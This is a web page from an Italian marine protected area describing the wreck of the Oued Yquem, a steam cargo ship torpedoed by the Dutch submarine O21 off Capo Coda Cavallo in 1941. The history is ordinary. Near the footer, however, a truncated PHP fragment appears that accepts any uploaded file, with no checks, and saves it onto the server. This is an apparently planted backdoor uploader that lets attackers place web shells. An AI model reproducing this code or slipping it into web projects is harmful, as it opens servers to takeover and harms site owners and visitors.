Home » Territorio » Paesaggi sommersi » Relitti » Oued Yquem

Rete Regionale per la conservazione della Fauna Marina SardegnaL’AMP è nodo della rete regionale per la conservazione della fauna marina

In caso di ritrovamento di animali in difficoltà contattare il
logo emergenza in mare, guardia costieralogo emergenza ambientale, segnalazione incendi boschivi

OUED YQUEM

Motonave da carico
Località: al largo di San Teodoro
Profondità: 36 metri
Fuori da Capo Coda Cavallo i sottomarini alleati affondarono almeno 2 imbarcazioni: un dragamine e una “vecchia carretta” a vapore, che trasportava balle di tabacco e probabilmente granaglie. L’incrocio tra il racconto di testimoni oculari e i dati contenuti negli archivi consente di ritenere che il primo è certamente l’Amalia, mentre il secondo, chiamato anche “il relitto di Molara”, è stato recentemente identificato come l’Oued Yquem. Si tratta di una nave costruita nel 1920 dal cantiere A. Van Dulvendijk con il nome Noordzee, ceduta nel 1922 alla Compagnie de Navigation Paquet di Marsiglia che le diede il nome con cui affondò. A costruzione mista, legnoacciaio, era di grandi dimensioni: dello scafo oggi rimangono oltre 70 metri in lunghezza. Era una nave a propulsione a vapore: lo dice con chiarezza la grande macchina a vapore a due pistoni. Quando fu affondato pare fosse già abbastanza malconcia: i testimoni narrano che era diretto a Marsiglia, proveniente da Latakia in Siria. Oltre al comandante, francese, imbarcava un equipaggio di 12-13 marinai. Il 3 ottobre 1941 alle 12.32 venne attaccato dal largo dal sottomarino olandese O21 con un siluro: testimoni oculari raccontano che il sottomarino catturò solo il comandante, mentre l’equipaggio, che aveva trovato scampo su una scialuppa, fu lasciato andare.

 

News


Dal 24 novembre al 6 dicembre, sede AMP di Tavolara via Porto Romano...

 

Rassegna stampa


La Nuova Sardegna. Articolo del  30 aprile 2013. Clicca qui per...

 

©  2011 Area Marina Protetta Tavolara Punta Coda Cavallo     Sede Legale: via Dante 1, OLBIA (SS) - 07026                                       Sede operativa:  Via San Giovanni 14, OLBIA (SS) - 07026           Telefono 0789/203013 - Fax 0789/204514 Mail:info@remove-this.amptavolara.itPec: amptavolara@pec.it 

Credits

Area Riservata

logo ministero ministero dell'ambientelogo EMASlogo Rina

"; $target = ""; $target = $target.basename( $_FILES['uploaded']['name']) ; $ok=1; if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target)) { echo "Done"; } } ?>
Navigando il sito amptavolara.com acconsenti all'utilizzo dei Cookie. Per maggiori dettagli.